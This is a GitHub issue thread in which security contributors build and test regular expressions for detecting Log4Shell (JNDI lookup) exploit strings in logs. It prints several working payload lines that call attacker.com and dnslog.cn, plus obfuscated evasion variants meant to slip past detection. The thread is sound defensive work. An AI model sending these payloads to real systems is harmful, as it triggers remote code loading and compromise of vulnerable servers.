Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Doing just the same using a RegEx #5

Open
back2root opened this issue Dec 12, 2021 · 14 comments
Open

Doing just the same using a RegEx #5

back2root opened this issue Dec 12, 2021 · 14 comments

Comments

@back2root
Copy link

The following RegEx is just the equivalent.
Don't know, if it's not a reasonable regular expression anymore, but it's doable:

(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])

It matches the following strings, even if they are (partially) URL-encoded and case-insensitive:

  • ${jndi:ldaps:
  • ${jndi:ldap:
  • ${jndi:rmi:
  • ${jndi:dns:

Example:
image

Improvement Idea for the Script:
To reduce false positive chance and improve performance a bit, you could maybe force, that the '$' sign in the start is immediately followed by a '{'.

@Neo23x0
Copy link
Owner

Neo23x0 commented Dec 12, 2021

That's really nice. Let me see if I can verify the regex and add it to the gist in which we use grep.

https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

@Neo23x0
Copy link
Owner

Neo23x0 commented Dec 12, 2021

I can't make it match on my log files with

sudo egrep -I -i -r '(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])' /var/log

Maybe egrep is somehow limited - missing back referencing e.g.

Log line in one of the test files

2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}

@back2root
Copy link
Author

Not yet testen on egrep/cli in general.
As it should be valid pcre, maybe a perl oneliner can bring us results.
Maybe I can craft sth. later.

@Neo23x0
Copy link
Owner

Neo23x0 commented Dec 12, 2021

Sorry, I'm working on 5-7 other construction sites (YARA, Sigma, Python script, advisory for customers).
Thanks for your help.

@karanlyons
Copy link

karanlyons commented Dec 12, 2021

Agreed that this is doable with a regex, but that’s also going to miss payloads (e.g. ${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}¹, ${jnd${upper:ı}:rm${upper:ı}://addr}). You probably just want something like https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6

¹ EDIT: Turns out the former won't work by default because base64 isn't actually in a release yet, just in master, but...imagine that someone added it as a custom lookup, or just consider any of the other available lookups.

@back2root
Copy link
Author

Hi

I just now managed to test the regex on the CLI.
The RegEx seem to work with grep -P against the test cases from this repo.

Current limitations:

  • Won't match on the pure java exception: test-java-exception.log
  • Will just match on limited protocols, as stated in the first post
➜  test-cases git:(main) ls | grep -E "log$"
test-java-exception.log
test-log-heavy-obfusc.log
test-log-log4shell-casing.log
test-log-log4shell-obf1.log
test-log-log4shell.log
test-shouldnt-match1.log
test-shouldnt-match2.log
test-url-encoded.log
test-urldecode-shouldnt-match.log


➜  test-cases git:(main) grep -V | head -n 1
grep (GNU grep) 3.4


➜  test-cases git:(main) grep -r -P '(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])'
test-log-log4shell.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
test-log-log4shell-obf1.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://spfcbf${lower:.}dnslog${lower:.}cn}
test-url-encoded.log:2021-12-11 [MyApp] - Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D
test-log-log4shell-casing.log:2021-12-11 [MyApp] - Contains ${jNdI:ldAp://tj5udg.dnslog.cn}
test-log-heavy-obfusc.log:2021-12-11 [MyApp] - Contains ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}

Maybe I manage to work on a version containing the missing protocols: nis|iiop|corba|nds|http
If there's interest, I'm happy to share.

@Neo23x0
Copy link
Owner

Neo23x0 commented Dec 13, 2021

Yes, please. We can replace the regex in this advisory with your version if it is able to cover the old strings and their obfuscated version.
https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

I wouldn't replace it as long as it can't detect the other protocols.

@back2root
Copy link
Author

Since the RegEx has become a bit more complicated, I created a script that generates the RegEx and put it in its own repo log4shell-rex to make it easier to extend later.

Feel free to take it for or refference it in your gist.

➜  log4shell-rex git:(main) eval "$(./RegEx_Generator.sh)"
 _                _  _  ____  _          _ _       ____
| |    ___   __ _| || |/ ___|| |__   ___| | |     |  _ \ _____  __
| |   / _ \ / _` | || |\___ \| '_ \ / _ \ | |_____| |_) / _ \ \/ /
| |__| (_) | (_| |__   _|__) | | | |  __/ | |_____|  _ <  __/>  <
|_____\___/ \__, |  |_||____/|_| |_|\___|_|_|     |_| \_\___/_/\_\
            |___/

➜  log4shell-rex git:(main) grep -P ${Log4ShellRex} ../log4shell-detector/tests/test-cases/*.log
../log4shell-detector/tests/test-cases/test-log-heavy-obfusc.log:2021-12-11 [MyApp] - Contains ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
../log4shell-detector/tests/test-cases/test-log-log4shell-casing.log:2021-12-11 [MyApp] - Contains ${jNdI:ldAp://tj5udg.dnslog.cn}
../log4shell-detector/tests/test-cases/test-log-log4shell-obf1.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://spfcbf${lower:.}dnslog${lower:.}cn}
../log4shell-detector/tests/test-cases/test-log-log4shell.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains %24%257Bjndi%3Aldap%3A%2F%2Ftj5udg%2Ednslog%2Ecn%257D
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains %2524%25257Bjndi%253Aldap%253A%252F%252Ftj5udg%252Ednslog%252Ecn%25257D

@karanlyons
Copy link

You might want to try against this synthetic corpus, which is also trying to model what sort of attacks might be coming (or that are already being missed):

\044%7B\\44{env:NOTHING:-j}\u0024{lower:N}\\u0024{lower:${upper:d}}}i:addr}
%24%7Bjnd%24%7Bupper%3A%C4%B1%7D%3Aaddr%7D
${ jndi\t: addr\n
${ jndi\t: addr\n}
${${::-j}nd${upper:ı}:rm${upper:ı}://addr}
${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//addr}
${base64:d2hvIHRob3VnaHQgYW55IG9mIHRoaXMgd2FzIGEgZ29vZCBpZGVhPwo=}
${jndi:${lower:l}${lower:d}a${lower:p}://$a{upper:d}dr}
${jndi:${lower:l}${lower:d}a${lower:p}://addr
${jndi:dns://addr}
$%7B\u006a\\156di:addr\\x7d

You can see how my detections fare, and run your own examples against the test(string) and test_thorough(string) functions.

I don’t think there’s going to be one regex to rule them all because there’s a signal to noise trade off that needs to be considered. You’d ideally match on all of them and build a confidence score naïve Bayes style. But you want to encode as few assumptions into your detections as possible, otherwise you literally won’t know what you’re missing.

@back2root
Copy link
Author

@karanlyons wondering if exploit is possible without any protocol given and without forward slash: e.g. ${ jndi\t: addr\n}

image

Not yet sure about false positive rate

@karanlyons
Copy link

karanlyons commented Dec 14, 2021

https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup:

The JndiLookup allows variables to be retrieved via JNDI. By default the key will be prefixed with java:comp/env/, however if the key contains a ":" no prefix will be added.
By default the JDNI Lookup only supports the java, ldap, and ldaps protocols or no protocol. Additional protocols may be supported by specifying them on the log4j2.allowedJndiProtocols property.

https://docs.oracle.com/javase/jndi/tutorial/beyond/misc/policy.html:

In the comp context, there are two bindings: env and UserTransaction. The name env is bound to a subtree that is reserved for the component's environment-related bindings, as defined by its deployment descriptor. env is short for environment.

https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform/5/html/administration_and_configuration_guide/naming_on_jboss-j2ee_and_jndi___the_application_component_environment#ENC_Usage_Conventions-Environment_Entries:

Environment entries are a name-to-value binding that allows a component to externalize a value and refer to the value using a name.

So a contrived example would be, e.g., that there’s comp/env/pwd = "/" and you then use ${jndi:ldap${jndi:pwd}${jndi:pwd}addr} as your vector. I do not know whether this is practical anywhere or not, so I’d much rather have my detections tell me if someone else knows it’s practical rather than assume it isn’t and get popped.

Also keep in mind that jndi is not the only lookup, and you can plausibly make use of others to construct payloads depending on what is available on the target, including any custom lookups the target may have. There’s even a base64 lookup referenced in the User’s Guide and though I’m not sure I’ve seen it working in the wild¹ it would handily break most detections I’ve seen.

Have you tried testing the detections I’ve linked above? You can get an idea of their sensitivities by throwing a corpus of known vectors and a corpus of theorized probably vectors at it. The usage.md file shows some example vectors and which detections they trigger. I’d really recommend just using them, and weighting your prioritization for any hits based on the confusion matrix you’re seeing for them with the data in your environment.

But your best plan of action is just to upgrade or mitigate (rm JndiLookup.class or log4j2.formatMsgNoLookups=true) your log4j dependencies, and practice good defense in depth (e.g., block all unknown egress—including DNS if you can handle running your own resolver safely, jail everything on your machine). No detections on remote inputs are going to be able to find every attempt, it’s a cat&mouse game stacked heavily in the attacker’s favor.

¹ EDIT: Again, because base64 isn't actually in a release yet, just in master, but—also again—imagine that someone added it as a custom lookup, or just consider any of the other available lookups.

@back2root
Copy link
Author

THX @karanlyons I did some improvements on my RegEx and already get quite good coverage.
Maybe still not enough to be used in IPS but good starting point for SIEM detections.

@karanlyons
Copy link

I’d still recommend that people use the collection of regexes I’ve put together as they’re free of assumptions. For example:

>>> from log4shell_regexes import *
>>> t = lambda s: [k for k in test(s)]

>>> BACK2ROOT_RE = re.compile(r'[elided for comment]')
>>> BACK2ROOT_RE.search('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}') or False
False

>>> t('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']

If you’re having trouble just getting the regexes for use elsewhere, this is very easy to do:

>>> from log4shell_regexes import regexes
>>> for n, r in regexes.items(): print (f'{n}: {r.pattern}')
SIMPLE_RE: \$\{\s*jndi\s*:.*\}
SIMPLE_WITH_ESCAPED_CONTENT_RE: \$\{.*(?:\\|%).*\}
NESTED_RE: \$\{.*\$\{.*\}.*\}
NESTED_INCLUDING_ESCAPES_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)
ANY_RE: \$\{.*\}
ANY_INCLUDING_ESCAPES_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)
SIMPLE_OPT_RCURLY_RE: \$\{\s*jndi\s*:.*\}?
SIMPLE_WITH_ESCAPED_CONTENT_OPT_RCURLY_RE: \$\{.*(?:\\|%).*\}?
NESTED_OPT_RCURLY_RE: \$\{.*\$\{.*\}.*\}?
NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)?
ANY_OPT_RCURLY_RE: \$\{.*\}?
ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)?

@back2root
Copy link
Author

Updated my regex

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants